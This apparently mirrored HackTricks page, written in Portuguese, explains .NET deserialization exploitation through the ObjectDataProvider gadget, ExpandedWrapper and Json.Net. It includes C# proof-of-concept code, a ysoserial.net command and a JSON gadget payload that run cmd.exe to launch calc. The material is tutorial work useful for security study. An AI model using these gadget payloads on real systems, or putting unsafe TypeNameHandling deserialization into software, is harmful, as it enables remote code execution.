mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
214 lines
10 KiB
Markdown
214 lines
10 KiB
Markdown
|
# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
Este post é dedicado a **entender como o gadget ObjectDataProvider é explorado** para obter RCE e **como** as bibliotecas de Serialização **Json.Net e xmlSerializer podem ser abusadas** com esse gadget.
|
||
|
|
||
|
## Gadget ObjectDataProvider
|
||
|
|
||
|
Da documentação: _a Classe ObjectDataProvider envolve e cria um objeto que você pode usar como uma fonte de vinculação_.\
|
||
|
Sim, é uma explicação estranha, então vamos ver o que essa classe tem de tão interessante: Esta classe permite **envolver um objeto arbitrário**, usar _**MethodParameters**_ para **definir parâmetros arbitrários** e então **usar MethodName para chamar uma função arbitrária** do objeto arbitrário declarado usando os parâmetros arbitrários.\
|
||
|
Portanto, o **objeto** arbitrário irá **executar** uma **função** com **parâmetros enquanto está sendo desserializado.**
|
||
|
|
||
|
### **Como isso é possível**
|
||
|
|
||
|
O namespace **System.Windows.Data**, encontrado dentro do **PresentationFramework.dll** em `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, é onde o ObjectDataProvider é definido e implementado.
|
||
|
|
||
|
Usando [**dnSpy**](https://github.com/0xd4d/dnSpy) você pode **inspecionar o código** da classe que nos interessa. Na imagem abaixo estamos vendo o código de **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Nome do método**
|
||
|
|
||
|
![](<../../.gitbook/assets/image (427).png>)
|
||
|
|
||
|
Como você pode observar, quando `MethodName` é definido, `base.Refresh()` é chamado, vamos dar uma olhada no que isso faz:
|
||
|
|
||
|
![](<../../.gitbook/assets/image (319).png>)
|
||
|
|
||
|
Ok, vamos continuar vendo o que `this.BeginQuery()` faz. `BeginQuery` é sobrescrito por `ObjectDataProvider` e isso é o que ele faz:
|
||
|
|
||
|
![](<../../.gitbook/assets/image (345).png>)
|
||
|
|
||
|
Note que no final do código está chamando `this.QueryWorke(null)`. Vamos ver o que isso executa:
|
||
|
|
||
|
![](<../../.gitbook/assets/image (596).png>)
|
||
|
|
||
|
Note que este não é o código completo da função `QueryWorker`, mas mostra a parte interessante dela: O código **chama `this.InvokeMethodOnInstance(out ex);`** esta é a linha onde o **método definido é invocado**.
|
||
|
|
||
|
Se você quiser verificar que apenas definindo o _**MethodName**_\*\* ele será executado\*\*, você pode executar este código:
|
||
|
```java
|
||
|
using System.Windows.Data;
|
||
|
using System.Diagnostics;
|
||
|
|
||
|
namespace ODPCustomSerialExample
|
||
|
{
|
||
|
class Program
|
||
|
{
|
||
|
static void Main(string[] args)
|
||
|
{
|
||
|
ObjectDataProvider myODP = new ObjectDataProvider();
|
||
|
myODP.ObjectType = typeof(Process);
|
||
|
myODP.MethodParameters.Add("cmd.exe");
|
||
|
myODP.MethodParameters.Add("/c calc.exe");
|
||
|
myODP.MethodName = "Start";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
Note que você precisa adicionar como referência _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ para carregar `System.Windows.Data`
|
||
|
|
||
|
## ExpandedWrapper
|
||
|
|
||
|
Usando o exploit anterior, haverá casos em que o **objeto** será **desserializado como** uma instância de _**ObjectDataProvider**_ (por exemplo, na vulnerabilidade do DotNetNuke, usando XmlSerializer, o objeto foi desserializado usando `GetType`). Então, não terá **conhecimento do tipo de objeto que está encapsulado** na instância de _ObjectDataProvider_ (`Process`, por exemplo). Você pode encontrar mais [informações sobre a vulnerabilidade do DotNetNuke aqui](https://translate.google.com/translate?hl=en\&sl=auto\&tl=en\&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F\&sandbox=1).
|
||
|
|
||
|
Esta classe permite **especificar os tipos de objeto dos objetos que estão encapsulados** em uma determinada instância. Assim, esta classe pode ser usada para encapsular um objeto fonte (_ObjectDataProvider_) em um novo tipo de objeto e fornecer as propriedades que precisamos (_ObjectDataProvider.MethodName_ e _ObjectDataProvider.MethodParameters_).\
|
||
|
Isso é muito útil para casos como o apresentado anteriormente, porque seremos capazes de **encapsular \_ObjectDataProvider**_\*\* dentro de uma instância de \*\*_**ExpandedWrapper** \_ e **quando desserializado** esta classe **criará** o objeto _**OjectDataProvider**_ que irá **executar** a **função** indicada em _**MethodName**_.
|
||
|
|
||
|
Você pode verificar este wrapper com o seguinte código:
|
||
|
```java
|
||
|
using System.Windows.Data;
|
||
|
using System.Diagnostics;
|
||
|
using System.Data.Services.Internal;
|
||
|
|
||
|
namespace ODPCustomSerialExample
|
||
|
{
|
||
|
class Program
|
||
|
{
|
||
|
static void Main(string[] args)
|
||
|
{
|
||
|
ExpandedWrapper<Process, ObjectDataProvider> myExpWrap = new ExpandedWrapper<Process, ObjectDataProvider>();
|
||
|
myExpWrap.ProjectedProperty0 = new ObjectDataProvider();
|
||
|
myExpWrap.ProjectedProperty0.ObjectInstance = new Process();
|
||
|
myExpWrap.ProjectedProperty0.MethodParameters.Add("cmd.exe");
|
||
|
myExpWrap.ProjectedProperty0.MethodParameters.Add("/c calc.exe");
|
||
|
myExpWrap.ProjectedProperty0.MethodName = "Start";
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
## Json.Net
|
||
|
|
||
|
Na [página oficial](https://www.newtonsoft.com/json) é indicado que esta biblioteca permite **Serializar e desserializar qualquer objeto .NET com o poderoso serializador JSON do Json.NET**. Portanto, se pudéssemos **desserializar o gadget ObjectDataProvider**, poderíamos causar um **RCE** apenas desserializando um objeto.
|
||
|
|
||
|
### Exemplo Json.Net
|
||
|
|
||
|
Primeiramente, vamos ver um exemplo de como **serializar/desserializar** um objeto usando esta biblioteca:
|
||
|
```java
|
||
|
using System;
|
||
|
using Newtonsoft.Json;
|
||
|
using System.Diagnostics;
|
||
|
using System.Collections.Generic;
|
||
|
|
||
|
namespace DeserializationTests
|
||
|
{
|
||
|
public class Account
|
||
|
{
|
||
|
public string Email { get; set; }
|
||
|
public bool Active { get; set; }
|
||
|
public DateTime CreatedDate { get; set; }
|
||
|
public IList<string> Roles { get; set; }
|
||
|
}
|
||
|
class Program
|
||
|
{
|
||
|
static void Main(string[] args)
|
||
|
{
|
||
|
Account account = new Account
|
||
|
{
|
||
|
Email = "james@example.com",
|
||
|
Active = true,
|
||
|
CreatedDate = new DateTime(2013, 1, 20, 0, 0, 0, DateTimeKind.Utc),
|
||
|
Roles = new List<string>
|
||
|
{
|
||
|
"User",
|
||
|
"Admin"
|
||
|
}
|
||
|
};
|
||
|
//Serialize the object and print it
|
||
|
string json = JsonConvert.SerializeObject(account);
|
||
|
Console.WriteLine(json);
|
||
|
//{"Email":"james@example.com","Active":true,"CreatedDate":"2013-01-20T00:00:00Z","Roles":["User","Admin"]}
|
||
|
|
||
|
//Deserialize it
|
||
|
Account desaccount = JsonConvert.DeserializeObject<Account>(json);
|
||
|
Console.WriteLine(desaccount.Email);
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
### Abusando Json.Net
|
||
|
|
||
|
Usando [ysoserial.net](https://github.com/pwntester/ysoserial.net) eu criei o exploit:
|
||
|
```java
|
||
|
ysoserial.exe -g ObjectDataProvider -f Json.Net -c "calc.exe"
|
||
|
{
|
||
|
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
|
||
|
'MethodName':'Start',
|
||
|
'MethodParameters':{
|
||
|
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
|
||
|
'$values':['cmd', '/c calc.exe']
|
||
|
},
|
||
|
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
|
||
|
}
|
||
|
```
|
||
|
Neste código você pode **testar a exploração**, basta executá-lo e você verá que um calc é executado:
|
||
|
```java
|
||
|
using System;
|
||
|
using System.Text;
|
||
|
using Newtonsoft.Json;
|
||
|
|
||
|
namespace DeserializationTests
|
||
|
{
|
||
|
class Program
|
||
|
{
|
||
|
static void Main(string[] args)
|
||
|
{
|
||
|
//Declare exploit
|
||
|
string userdata = @"{
|
||
|
'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
|
||
|
'MethodName':'Start',
|
||
|
'MethodParameters':{
|
||
|
'$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
|
||
|
'$values':['cmd', '/c calc.exe']
|
||
|
},
|
||
|
'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
|
||
|
}";
|
||
|
//Exploit to base64
|
||
|
string userdata_b64 = Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(userdata));
|
||
|
|
||
|
//Get data from base64
|
||
|
byte[] userdata_nob64 = Convert.FromBase64String(userdata_b64);
|
||
|
//Deserialize data
|
||
|
string userdata_decoded = Encoding.UTF8.GetString(userdata_nob64);
|
||
|
object obj = JsonConvert.DeserializeObject<object>(userdata_decoded, new JsonSerializerSettings
|
||
|
{
|
||
|
TypeNameHandling = TypeNameHandling.Auto
|
||
|
});
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|